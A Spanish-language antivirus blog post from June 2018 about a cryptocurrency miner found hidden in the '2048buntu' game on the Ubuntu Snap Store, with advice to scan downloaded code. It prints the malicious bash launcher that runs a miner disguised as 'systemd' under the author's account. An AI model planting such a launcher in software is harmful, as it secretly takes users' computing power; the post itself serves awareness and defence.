¡Vd. usa un navegador obsoleto!

Es posible que la página no se visualice correctamente.

Aguafiestas

Незваные гости

Otras ediciones de este tema (76)
  • añadir a favoritos
    Añadir a marcadores

Mi primer Ferrari

Consultas: 1042 Comentarios: 2 Ranking: 9

martes, 5 de junio de 2018

Los encoders para Linux son una cosa muy frecuente, nuestra empresa detectó el primero. Los miners para Linux también son conocidos – los ordinarios, no nocivos. Pero sería raro si con tanta popularidad los malintencionados no intentaran ganar un poco de dinero a través de los usuarios ordinarios de este sistema operativo.

En la distribución popular de Ubuntu hace poco apareció un nuevo formato de aplicaciones – un paquete snap. Por lo tanto, apareció una tienda oficial, similar a Windows Store. Todo sirvió para facilitar el trabajo del usuario con el sistema. Pero nadie iba a escanear las aplicaciones que se subían a la tienda.

Un usuario prudente detectó en el código del juego un miner de criptodivisa y un script que firmaba automáticamente el inicio de este miner.

El código abierto es muy cómodo, enseguida se puede ver todos los planes nocivos de las aplicaciones que son más o menos así:


#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

https://github.com/canonical-websites/snapcraft.io/issues/651

Pero por alguna razón nadie lo notaba. Es más, los miners y scripts aparecieron también en otras aplicaciones del mismo autor. El código nocivo obtenía la criptodivisa para un usuario con la dirección que se traduce como «mi primer Ferrari». No hay contador de descargas o instalaciones en Ubuntu Snap Store, por lo tanto, no podemos saber si el creador de virus ha podido ahorrar dinero para comprar el coche de su sueño.

#Linux #juegos #mining

El mundo de antivirus recomienda

  1. Al usar Linux, tenga prudencia. Si cada uno puede escanear los códigos fuente del software con el código abierto, esto no significa que cada uno escanea algo. Frecuentemente en la práctica uno piensa que lo hará otra persona, y al mismo tiempo el código nocivo o la vulnerabilidad peligrosa se difunde e infecta muchas estaciones de trabajo y servidores.
  2. Escanee el código de cada programa que tiene previsto descargar e instalar o use el antivirus. No espere que lo haga otra persona.

[Twitter]

Nos importa su opinión

Para redactar un comentario, debe iniciar sesión para entrar en su cuenta del sitio web Doctor Web. - Si aún no tiene la cuenta, puede crearla.

Comentarios de usuarios

Comentarios a otras ediciones | Mis comentarios